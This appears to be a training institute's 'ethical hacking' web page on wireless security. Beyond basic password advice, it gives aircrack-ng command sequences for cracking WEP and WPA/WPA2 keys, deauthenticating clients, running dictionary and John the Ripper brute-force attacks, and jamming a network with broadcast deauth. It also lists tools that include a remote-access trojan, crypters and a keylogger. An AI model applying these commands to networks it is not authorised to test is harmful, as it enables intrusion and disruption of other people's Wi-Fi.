How Does Wireless Security Work

How Does Wireless Security Work

Why we do need wireless security
free wifi —> terrorist connect—-> email send —> inocent user got punish…..
Wireless secure
Strong password
–> numbers
–> alphabet
–> lowercase
–> upper case
–> special character
–> Minimum length –> 8 characters
–> Never share your wifi password
–> Frequentely change
–> Disable WPS
WiFi –> IEEE 802.11 –> Set of rules

WiFi Encryption – Wireless Security

WEP –> RC4
DES –> Data Encryption Standard
AES –> Advance Encryption Standard
Step 1: To start the monitor mode
Step 2: To start gathering information about the wireless signals
Step 3: To start capturing the packets
Step 4: Cracking the WiFi password
Cracking WEP encryption
> airmon-ng start wlan0
kill processes
> airodump-ng wlan0mon
> airodump-ng –bssid <Target Router’s bssid> -c <channel number> -w wepcap wlan0mon
–bssid –> router’s mac address
-c –> channel number
-w –> to write/capture packets
> aircrack-ng wepcap-01.cap
Cracking WPA/WPA2
> airmon-ng start wlan0
kill processes
> airodump-ng wlan0mon
> airodump-ng –bssid <Target Router’s bssid> -c <channel number> -w wepcap wlan0mon
–bssid –> router’s mac address
-c –> channel number
-w –> to write/capture packets
> aireplay-ng -0 10 -a <bssid of router> -c <bssid of user> wlan0mon
-0 –> deauthentication packet
-a –> mac of target router
-c –> mac of any connected client
Dictionary attack
–> rockyou.txt –> /usr/share/wordlist/rockyou.txt
> aircrack-ng filename -w <pathOfDictionary>
Brute Force
–> John the ripper
> john –stdout –incremental | aircrack-ng -e “dlink-FA0C” -w – test001-01.cap
wifi jammer
aireplay-ng -0 0 -a C0:A0:BB:F4:FA:0C -c FF:FF:FF:FF:FF:FF wlan0mon
This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show  the  interfaces status.  It can also list/kill programs that can interfere with the wireless card operation.
airodump-ng  is  used  for packet capturing of raw 802.11 frames for the intent of using them
       with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng is  capa‐
       ble  of  logging the coordinates of the found access points. Additionally, airodump-ng writes
       out a text file containing the details of all access points and clients seen.

 Beacons – Wireless Security

              Number of beacons sent by the AP. Each access point sends about ten beacons per second
              at the lowest rate (1M), so they can usually be picked up from very far.
       #Data  Number  of  captured  data packets (if WEP, unique IV count), including data broadcast
       #/s    Number of data packets per second measure over the last 10 seconds.
       CH     Channel number (taken from beacon packets). Note: sometimes packets from  other  chan‐
              nels are captured even if airodump-ng is not hopping, because of radio interference.
       MB     Maximum  speed supported by the AP. If MB = 11, it’s 802.11b, if MB = 22 it’s 802.11b+
              and higher rates are 802.11g. The dot (after 54 above)  indicates  short  preamble  is
              supported. ‘e’ indicates that the network has QoS (802.11e) enabled.
       ENC    Encryption  algorithm  in  use. OPN = no encryption,”WEP?” = WEP or higher (not enough
              data to choose between WEP and WPA/WPA2), WEP (without the  question  mark)  indicates
              static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
       CIPHER The  cipher  detected.  One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory,
              but TKIP is typically used with WPA and CCMP is typically used  with  WPA2.  WEP40  is
              displayed when the key index is greater then 0. The standard states that the index can
              be 0-3 for 40bit and should be 0 for 104 bit.
       AUTH   The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication
              server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for
       WPS    This is only displayed when –wps (or -W) is specified. If the AP  supports  WPS,  the
              first  field of the column indicates version supported. The second field indicates WPS
              config methods (can be more than one method, separated by comma): USB  =  USB  method,
              ETHER  = Ethernet, LAB = Label, DISP = Display, EXTNFC = External NFC, INTNFC = Inter‐
              nal NFC, NFCINTF = NFC Interface, PBC = Push Button, KPAD =  Keypad.  Locked  is  dis‐
              played when AP setup is locked.
       ESSID  The  so-called  “SSID”,  which can be empty if SSID hiding is activated. In this case,
              airodump-ng will try  to  recover  the  SSID  from  probe  responses  and  association
aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.
       It can recover the WEP key once enough encrypted packets have been captured with airodump-ng.
       This part of the aircrack-ng suite determines the WEP key using two fundamental methods.  The
       first method is via the PTW approach (Pyshkin, Tews, Weinmann). The main advantage of the PTW
       approach is that very few data packets are required to crack the WEP key. The  second  method
       is  the  FMS/KoreK  method.  The FMS/KoreK method incorporates various statistical attacks to
       discover the WEP key and uses these in combination with brute forcing.
       Additionally, the program offers a dictionary method for determining the WEP key. For  crack‐
       ing WPA/WPA2 pre-shared keys, a wordlist (file or stdin) or an airolib-ng has to be used.
aireplay-ng is used to inject/replay frames.  The primary function is to generate traffic for
       the later use in aircrack-ng for cracking the WEP  and  WPA-PSK  keys.  There  are  different
       attacks  which  can  cause deauthentications for the purpose of capturing WPA handshake data,
       fake authentications, Interactive packet replay, hand-crafted ARP request injection and  ARP-
       request reinjection. With the packetforge-ng tool it’s possible to create arbitrary frames.

Skills – Wireless Security

Bypassing OS Login
System Protection/PT
Malware Protection
Information Gathering
Social Engineering
Email Security
Wireless Protection
Traffic Monitoring
Mobile Platform Security/PT
WiFi Security/PT

Tools – Wireless Security

hotspotshot shield
hiren boot cd
kon boot cd
dark comet
urge cryptor
chrome cryptor
family key logger
angry ip scanner
xampp server
burp suite
mod security
IBM app scaner
john the ripper

Follow Us On Cyber Point Solution Youtube Channel : Click Here

Follow Us on Social Platforms to get Updated : twiter,  facebookGoogle Plus

Learn More Ethical Hacking and Cyber Security click on this link. cyber security

Leave a Reply

Your email address will not be published. Required fields are marked *